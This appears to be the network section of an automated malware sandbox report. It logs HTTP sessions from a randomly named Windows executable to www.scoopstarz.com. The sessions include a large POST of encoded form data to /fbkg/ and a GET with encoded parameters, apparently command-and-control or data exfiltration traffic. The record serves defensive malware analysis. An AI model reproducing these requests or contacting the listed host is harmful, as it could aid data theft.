                                                                                                                                                                                                Data Ascii: kq8M1CKMTeuAPqWpjaol35QS0CckeLamubCsJo2XQ7jrNqDHal7QPD+0iaZv9D5yfHIa8icBNAq804vPrVu1OUZSWuwgiFObtMMeqKRN43XLvt9GBwZKMrvX9LMmnA+433MSO9N24wqR488uipBLq7q90pXhQ4lswk+EfgZ2uTWyNmCdEo3cObI05kE11AJ6UhCjdXT70jJ4xcwcOSBTM3PiMUp9vp+HeWy3k2yeNMwoswIYA9n
                                                                                                                                                                                                Nov 17, 2023 19:31:13.039777040 CET1231OUTData Raw: 61 6f 61 30 67 2f 77 33 39 32 70 46 4a 43 78 61 47 39 76 32 67 53 36 61 34 77 71 2b 4a 70 2f 4c 4d 4d 33 55 51 53 76 4f 52 4a 44 75 7a 74 52 55 43 50 69 44 2f 62 56 42 54 5a 62 54 46 55 68 4a 45 47 6f 4a 45 79 37 66 32 32 33 75 39 6a 48 74 58 71
                                                                                                                                                                                                Data Ascii: aoa0g/w392pFJCxaG9v2gS6a4wq+Jp/LMM3UQSvORJDuztRUCPiD/bVBTZbTFUhJEGoJEy7f223u9jHtXquhcamPZk8EiV2xlbREnkvLvilFITOQIwVX6Ae3kNC810j72lI4H00uJX/ubiw2sgfNE/TbKeigQ9g+WsbUFeEMqdQn8XIURozqc9oQsgFweqsOwlWDc18MywXB6+uq+RluGxLZ+ysvxR/4GbOQNXmgwiGBEYxbC4U
                                                                                                                                                                                                Nov 17, 2023 19:31:13.360464096 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:31:13 GMT
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5a8A52qY0xZq5KrWL36RtxvY5VWO9Mb5uNigujotEtn9mUL1vt8XwJrOJ3TRdCMY%2BQshbdrMfF%2BCPXFLmpwSqOBCcojDDs1%2BFjKxiHEKpzcGKs5gNsVuJemZ1VTrkdETQFU4Mn8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 827a0ca188018ce2-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                57104.21.52.18280192.168.11.2050184C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:12.838767052 CET1194OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.scoopstarz.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.scoopstarz.com
                                                                                                                                                                                                Referer: http://www.scoopstarz.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 6b 2f 70 50 31 74 4b 6a 44 7a 78 64 70 65 65 55 75 32 33 42 4a 6c 6d 7a 65 53 51 76 59 49 6f 48 65 50 6a 6c 56 51 6c 49 36 6b 4a 2b 52 76 30 6f 61 37 2f 7a 53 4f 36 6a 6a 45 75 46 6a 34 6c 4f 4e 4d 2f 52 2b 75 31 30 6a 50 52 68 51 7a 47 4d 4f 47 63 36 37 34 73 34 50 79 67 6c 4a 59 34 63 51 33 30 63 46 65 6b 57 2f 30 4e 30 4f 70 4c 35 4c 6f 33 6c 63 56 73 44 56 61 4a 68 72 49 67 55 56 63 4e 67 4c 38 65 76 65 6b 51 31 55 46 44 38 45 6d 37 4d 6d 73 69 35 53 47 44 58 62 45 65 71 2b 32 57 4a 39 47 54 75 69 36 6b 49 75 44 2f 34 65 4d 75 5a 4c 4f 65 51 50 7a 4b 5a 65 51 63 62 37 58 63 57 56 54 4d 77 43 4e 64 61 69 6e 39 36 6a 2f 67 33 30 7a 79 45 48 58 63 33 72 6e 6e 6f 66 4e 34 46 64 6b 44 4e 50 61 53 64 64 36 4c 67 2f 34 58 58 2b 52 55 75 39 46 46 32 33 61 32 32 79 49 4a 77 7a 49 4e 4d 76 78 59 4f 4c 42 66 4b 75 46 4c 33 57 44 38 62 37 72 71 37 79 35 7a 57 32 72 4e 68 73 2b 4f 55 46 4f 33 6d 6b 78 51 4a 4e 36 51 2b 65 4e 2f 33 61 4f 51 4b 2f 39 6d 74 58 78 67 6b 6c 52 6a 65 39 79 6c 31 38 63 6e 58 34 6e 45 46 2b 4b 34 33 67 44 70 6a 69 46 4c 6f 6c 34 71 70 42 55 72 4f 63 6e 69 51 51 79 37 36 58 53 56 51 2f 68 6f 74 2b 38 35 63 46 69 4d 4d 44 36 4d 54 6f 6c 6f 47 51 2b 70 32 30 6a 62 6c 33 61 75 58 74 50 44 79 6a 6f 4b 63 50 4e 4d 55 47 4e 62 61 57 78 7a 55 58 65 4f 77 78 63 68 38 6b 44 77 7a 68 7a 6a 63 6a 76 4d 77 54 79 4f 78 47 57 4e 75 77 6d 4f 69 49 69 47 37 4b 4c 59 71 4c 6f 72 48 68 4b 32 64 55 44 50 76 59 41 32 56 64 50 66 4a 66 34 5a 50 75 4f 2b 69 58 30 31 74 49 53 77 43 4a 68 31 53 4a 31 69 46 4f 44 78 7a 64 66 6b 57 62 32 63 4a 58 30 39 42 6d 51 79 72 46 36 59 70 43 45 38 6d 6c 37 5a 32 76 66 63 50 56 31 39 49 64 64 45 66 58 2b 62 5a 32 71 70 52 69 5a 62 74 45 6f 49 6b 6d 6a 35 72 50 4d 54 72 5a 2f 38 70 4d 71 65 2b 64 79 62 52 46 59 43 69 30 79 4c 50 41 55 57 64 6d 5a 33 42 70 78 61 51 46 47 69 47 6a 66 70 50 4d 56 62 2b 5a 79 48 53 61 31 69 43 44 6d 45 6f 4e 41 63 58 6b 49 4a 69 2f 65 65 61 49 49 44 52 6c 52 2f 34 47 66 6c 72 6d 2b 2f 33 4b 48 6f 67 2b 71 43 74 41 74 71 6f 68 66 44 30 41 79 6d 50 52 4d 54 30 64 53 52 36 53 57 44 34 67 71 79 74 49 44 36 6a 65 4f 4e 64 4a 68 2f 65 2b 6e 32 70 71 48 79 45 6c 63 37 45 78 6a 38 33 72 46 57 37 68 71 6e 72 39 2f 51 4d 63 63 4e 4d 4d 48 74 57 7a 2f 4a 66 48 36 44 43 4d 32 6c 78 6f 35 6b 6b 63 32 4d 69 48 4c 33 6e 51 31 4b 31 66 72 76 32 32 33 56 56 34 7a 56 54 32 62 74 59 2f 34 61 64 6c 54 4c 2b 79 4c 39 49 50 4c 56 78 66 6f 76 63 39 6f 51 6a 6f 6d 6a 41 35 61 33 54 6c 34 4e 41 42 32 6c 7a 79 78 6a 65 36 2f 77 73 59 68 6a 41 32 6b 55 69 4c 32 76 59 5a 76 6a 58 61 55 6a 41 6f 30 79 7a 4c 73 6b 30 4b 34 38 47 7a 5a 5a 48 4a 31 50 74 78 39 59 54 7a 6d 44 38 74 4b 6d 58 63 46 2b 63 6d 71 4d 57 2b 6e 63 6d 2b 58 44 4d 35 6b 63 45 53 70 56 5a 4d 72 37 6e 4e 79 4a 41 35 62 47 69 4d 4d 39 67 57 6b 4d 78 66 73 39 6d 4b 31 56 43 61 7a 43 74 57 4e 42 73 38 2f 4a 75 72 78 56 50 4c 57 4a 6f 45 38 32 58 54 65 4f 73 4f 51 42 4e 6e 53 6b 2f 42 73 4c 4d 4e 70 55 70 43 6c 4b 73 4d 32 41 71 71 63 33 72 79 33 67 59 4a 6b 4c 58 71 6b 62 55 70 65 63 54 54 63 75 43 71 54 37 38 6d 6b 6d 33 74 63 76 34 49 68 50 30 55 4a 7a 4a 42 6d 62 65 62 66 59 72 34 66 4a 43 33 78 54 76 4d 6c 44 73 65 61 41 56 33 42 61 69 67 63 61 74 50 6d 44 66 35 47 62 2f 6f 43 46 53 34 78 2b 41 49 68 45 4e 78 50 31 4a 69 45 55 62 4b 4e 56 42 51 6f 5a 42 37 4e 47 70 51 36 55 68 64 6b 76 4c 43 5a 44 79 49 6e 6f 39 31 75 6c 75 71 78 4c 55 75 4d 4a 50 64 4f 68 67 7a 5a 33 59 69 77 6f 71 72 62 30 54 6a 4d 6f 6b 6b 6e 62 59 42 44 6a 76 2b 32 46 41 62 57 45 54 5a 77 75 33 7a 5a 48 49 59 33 44 71 78 55 36 65 43 4e 31 45 43 73 75 5a 2b 4f 48 77 4d 59 53 2f 34 44 4c 4e 39 41 43 35 4e 45 2b 55 68 72 62 63 68 72 37 44 37 49 68 71 71 2f 63 6e 42 46 77 42 4a 43 59 5a 2f 42 69 58 42 37 6d 7a 2f 46 33 76 73 76 56 4e 43 45 6e 47 4d 4e 34 5a 57 76 47 68 35 45 51 4b 79 6a 39 37 65 39 39 41 50 54 65 4e 6d 76 69 37 75 38 48 53 71 66 4a 5a 47 64 37 4f 4a 57 48 2f 6e 4c 33 2f 32 2b 72 2b 55 4f 55 61 50 4f 41 56 51 50 55 7a 31 79 77 78 53 7a 69 4c 68 35 47 61 4e 47 37 72 37 46 4e 65 34 36 33 74 6a 78 49 77 31 58 69 7a 58 75 35
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:31:12.939686060 CET1200OUTData Raw: 78 36 43 2b 2b 4a 74 2b 55 57 34 75 78 6c 72 72 4d 4c 51 39 74 51 4f 45 51 5a 6d 7a 68 6d 6c 75 52 44 42 4b 51 42 76 69 4e 47 57 6a 43 48 59 4f 4c 71 47 6f 49 38 68 32 4d 53 6d 6f 59 65 50 79 4c 57 6d 44 53 79 75 5a 37 4f 6c 42 78 33 46 6d 44 51
                                                                                                                                                                                                Data Ascii: x6C++Jt+UW4uxlrrMLQ9tQOEQZmzhmluRDBKQBviNGWjCHYOLqGoI8h2MSmoYePyLWmDSyuZ7OlBx3FmDQdtTxIg0zNk5yNJ23rOpIEJwSwG6zrrzkcLc38/fwPPbQ7xe9yM6HpE3KpKhSAc6vSQa9b+PUL+7qwHh12GoGqXfnpSkWRg4TSJdQVWBtT6d/p2j5zh6DLkqUrrDjHbFTpmj7coid5O6w0aVKdYlLpldF0mUfsIa70
                                                                                                                                                                                                Nov 17, 2023 19:31:12.939795971 CET1207OUTData Raw: 78 6c 70 67 57 49 36 4e 69 6b 38 6d 36 4b 77 6b 46 76 63 76 53 36 65 50 4c 32 4c 59 42 72 51 30 70 4a 73 70 52 41 48 64 32 35 4f 47 39 4c 76 4b 65 76 31 48 58 6e 72 55 6b 2b 67 6a 4c 4c 58 79 42 61 65 41 2b 59 4c 79 71 32 67 6c 7a 65 67 4e 46 71
                                                                                                                                                                                                Data Ascii: xlpgWI6Nik8m6KwkFvcvS6ePL2LYBrQ0pJspRAHd25OG9LvKev1HXnrUk+gjLLXyBaeA+YLyq2glzegNFqEwDr3HpapCKBFyh0r4cIWPNbVCKxjF/1wZocxRKvHWSPdLcB1mxWZcCDPGtL0xGX/fsZDbtnQea+yY+LWiHzPAZWYO2TpqzKP+W4ddsTzw7v1006bkwd5JBOke+zaLlJruXqyFiiIBgkTREVqjUv9NwlupNLJBA1R
                                                                                                                                                                                                Nov 17, 2023 19:31:12.940035105 CET1214OUTData Raw: 69 59 38 61 4a 35 79 57 4c 62 4c 31 43 51 51 2b 64 32 58 31 72 68 4a 6f 63 6b 56 75 42 2b 43 4b 75 48 77 64 62 54 34 46 45 4e 52 53 37 5a 54 72 38 55 4a 64 6c 49 6c 6a 35 72 70 30 78 44 4e 54 72 75 6c 70 52 4a 57 4b 65 76 63 5a 35 43 6f 33 78 48
                                                                                                                                                                                                Data Ascii: iY8aJ5yWLbL1CQQ+d2X1rhJockVuB+CKuHwdbT4FENRS7ZTr8UJdlIlj5rp0xDNTrulpRJWKevcZ5Co3xHUtegCEEzURNveVkuTjeoGig16uBkLyNAHz8J1KslLU93FTJ6OGgni0dEnWVbDkQGrZm+vi7IVAgmQ+gAAgwhfHjsCdcGZg0kgRKdHcU4yJmOX8tmzdOyC0WVN3HTboa0dVl1ZGginwv8JsOJ0+nVOMg+dKEPcJgEl
                                                                                                                                                                                                Nov 17, 2023 19:31:12.940360069 CET1217OUTData Raw: 4a 30 4f 5a 49 53 72 42 66 58 6c 4f 44 4e 31 65 77 52 61 33 61 73 33 44 57 57 75 4e 46 4c 4a 58 78 78 38 4e 5a 51 69 66 4f 5a 2b 49 61 65 7a 44 4a 54 37 39 32 6f 65 33 69 68 2f 5a 42 45 49 59 58 54 41 79 6d 6f 4e 4d 4a 51 6f 37 37 45 4d 62 54 54
                                                                                                                                                                                                Data Ascii: J0OZISrBfXlODN1ewRa3as3DWWuNFLJXxx8NZQifOZ+IaezDJT792oe3ih/ZBEIYXTAymoNMJQo77EMbTT8e5mq+sP4dNCsos9KAkTUiNxp2BaNA3N/UKwHEj6flEX7HVj/rd/Iu13hnvsYeP7ozUpe1Vk1TbqOVU+qL2pvm9E2uwQEBK1609Obdp7r9QUrcS+GA4Zcc1OUpBHMlZn7xrgr4v4F4aNojlA6YXqU1v6OChJ+gcJp
                                                                                                                                                                                                Nov 17, 2023 19:31:12.940700054 CET1219OUTData Raw: 6f 6e 38 6a 59 6f 36 6e 47 52 4d 58 38 7a 4c 33 4f 38 6a 2b 61 66 43 2b 6c 6d 4d 42 50 30 59 62 51 6a 62 75 46 4b 42 63 55 73 55 4f 75 55 77 70 6c 6e 52 77 47 58 33 4a 4b 39 58 58 46 43 43 67 74 72 39 36 78 58 45 56 47 43 6e 6e 5a 59 37 59 59 58
                                                                                                                                                                                                Data Ascii: on8jYo6nGRMX8zL3O8j+afC+lmMBP0YbQjbuFKBcUsUOuUwplnRwGX3JK9XXFCCgtr96xXEVGCnnZY7YYXlSFi289M7eufNDy74e1/Q5UO34N7Z2AkbzmRVXyOglxWghFUkdUi5TT8QlfwkRvqLRs7oXt7p56d+GMntB7jbZ/XSrzRw9AoVds3qg7t+iEp2lOFMYL9i/k4g3iNLKiorIFXxBfLmq7RMmFpYMC6qYzUz8y2U8jDh
                                                                                                                                                                                                Nov 17, 2023 19:31:13.038619041 CET1222OUTData Raw: 59 66 76 53 71 5a 76 73 33 63 57 69 44 64 37 33 33 41 75 67 56 56 4c 6b 4d 5a 73 44 68 51 70 4a 4d 6f 54 58 77 30 67 51 45 2b 76 71 55 56 55 66 47 52 57 4f 4b 72 58 4a 69 78 4b 7a 6f 45 73 78 41 78 57 39 75 44 43 48 41 54 55 51 46 6b 30 73 42 31
                                                                                                                                                                                                Data Ascii: YfvSqZvs3cWiDd733AugVVLkMZsDhQpJMoTXw0gQE+vqUVUfGRWOKrXJixKzoEsxAxW9uDCHATUQFk0sB1oW6tW78xmDFZXaqt+DkccF2nOphzJxGmTIOX5cYLXkgQ/2j08AJ83tQmBXr7KdBF+/vc+lRBq+NhwPmqvvYjbSXRrPuRzCPsvRxenm14+rZqvv6Fn/tjOjeakYafbBKdb0JAgXq54T+s9Sh5Wihu7H02EPLKiPs/T
                                                                                                                                                                                                Nov 17, 2023 19:31:13.038733006 CET1225OUTData Raw: 4c 6f 47 79 38 75 6b 6a 74 75 71 66 59 35 57 50 42 4a 30 4c 50 35 35 30 4b 65 4b 4b 4e 37 4e 79 2f 32 30 73 74 70 30 75 6f 66 6b 6a 4f 6c 64 6f 48 55 46 57 46 47 6c 58 47 74 47 71 6d 71 61 51 63 65 6b 44 50 72 42 4c 69 62 34 34 4f 50 62 71 4d 37
                                                                                                                                                                                                Data Ascii: LoGy8ukjtuqfY5WPBJ0LP550KeKKN7Ny/20stp0uofkjOldoHUFWFGlXGtGqmqaQcekDPrBLib44OPbqM76oNh7EGBIC793HOfAp64dyqK6nmNnQAeQiA0Qe3niztf48D8gWGaYwtxRCnxc1Kb5/YdWEPKdJvV/JxtnbKR47PE3p+K8TCyQqEvvwuHMkQfyjljzTm1C78Tuy/kCfNeAlqMdC8omUuLfKtcxdp+nd/3xWGyt2EfZ
                                                                                                                                                                                                Nov 17, 2023 19:31:13.039459944 CET1227OUTData Raw: 67 61 36 61 78 6d 53 51 43 66 53 6f 2f 33 2b 48 2b 78 6f 78 39 71 34 57 58 51 78 68 56 43 42 6b 46 61 2f 41 53 55 37 58 4b 2b 6a 63 48 70 7a 78 61 48 63 72 57 78 51 53 54 2f 36 65 70 4f 4a 33 4e 34 37 46 64 4c 4b 33 31 52 58 57 49 35 2b 63 38 44
                                                                                                                                                                                                Data Ascii: ga6axmSQCfSo/3+H+xox9q4WXQxhVCBkFa/ASU7XK+jcHpzxaHcrWxQST/6epOJ3N47FdLK31RXWI5+c8DDnMy0uyAvZmpq5uU3oj21lzIFX0R0DxoITBDu5TUEKaTwo7A/m792v7Z/N1WMrqOQEMUExdb2UW53LcQ4EopVb63tqV7UCt+3/qkad366Je9VGgn/rdvWqKIPt85mUO0d//RDP63oaeN0HH/XtY4jnSq4aexy7BSD
                                                                                                                                                                                                Nov 17, 2023 19:31:13.039572954 CET1230OUTData Raw: 6b 71 38 4d 31 43 4b 4d 54 65 75 41 50 71 57 70 6a 61 6f 6c 33 35 51 53 30 43 63 6b 65 4c 61 6d 75 62 43 73 4a 6f 32 58 51 37 6a 72 4e 71 44 48 61 6c 37 51 50 44 2b 30 69 61 5a 76 39 44 35 79 66 48 49 61 38 69 63 42 4e 41 71 38 30 34 76 50 72 56
                                                                                                                                                                                                Data Ascii: kq8M1CKMTeuAPqWpjaol35QS0CckeLamubCsJo2XQ7jrNqDHal7QPD+0iaZv9D5yfHIa8icBNAq804vPrVu1OUZSWuwgiFObtMMeqKRN43XLvt9GBwZKMrvX9LMmnA+433MSO9N24wqR488uipBLq7q90pXhQ4lswk+EfgZ2uTWyNmCdEo3cObI05kE11AJ6UhCjdXT70jJ4xcwcOSBTM3PiMUp9vp+HeWy3k2yeNMwoswIYA9n
                                                                                                                                                                                                Nov 17, 2023 19:31:13.039777040 CET1231OUTData Raw: 61 6f 61 30 67 2f 77 33 39 32 70 46 4a 43 78 61 47 39 76 32 67 53 36 61 34 77 71 2b 4a 70 2f 4c 4d 4d 33 55 51 53 76 4f 52 4a 44 75 7a 74 52 55 43 50 69 44 2f 62 56 42 54 5a 62 54 46 55 68 4a 45 47 6f 4a 45 79 37 66 32 32 33 75 39 6a 48 74 58 71
                                                                                                                                                                                                Data Ascii: aoa0g/w392pFJCxaG9v2gS6a4wq+Jp/LMM3UQSvORJDuztRUCPiD/bVBTZbTFUhJEGoJEy7f223u9jHtXquhcamPZk8EiV2xlbREnkvLvilFITOQIwVX6Ae3kNC810j72lI4H00uJX/ubiw2sgfNE/TbKeigQ9g+WsbUFeEMqdQn8XIURozqc9oQsgFweqsOwlWDc18MywXB6+uq+RluGxLZ+ysvxR/4GbOQNXmgwiGBEYxbC4U
                                                                                                                                                                                                Nov 17, 2023 19:31:13.360464096 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:31:13 GMT
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5a8A52qY0xZq5KrWL36RtxvY5VWO9Mb5uNigujotEtn9mUL1vt8XwJrOJ3TRdCMY%2BQshbdrMfF%2BCPXFLmpwSqOBCcojDDs1%2BFjKxiHEKpzcGKs5gNsVuJemZ1VTrkdETQFU4Mn8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 827a0ca188018ce2-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                58192.168.11.2050185104.21.52.18280C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:15.460530043 CET1237OUTGET /fbkg/?T6I=p9Bv2ZaqDj0B+e+ypRT8GlSwNlQxTeh6EqXXTwB9+WRzCtFNeIn1Fpb3phnzmJVlQdbT0fpxscdkLw+HDUtKzdkzARk7C/olAA==&Nx1L1=526dgl_phJ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.scoopstarz.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:31:15.717394114 CET1237INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:31:15 GMT
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
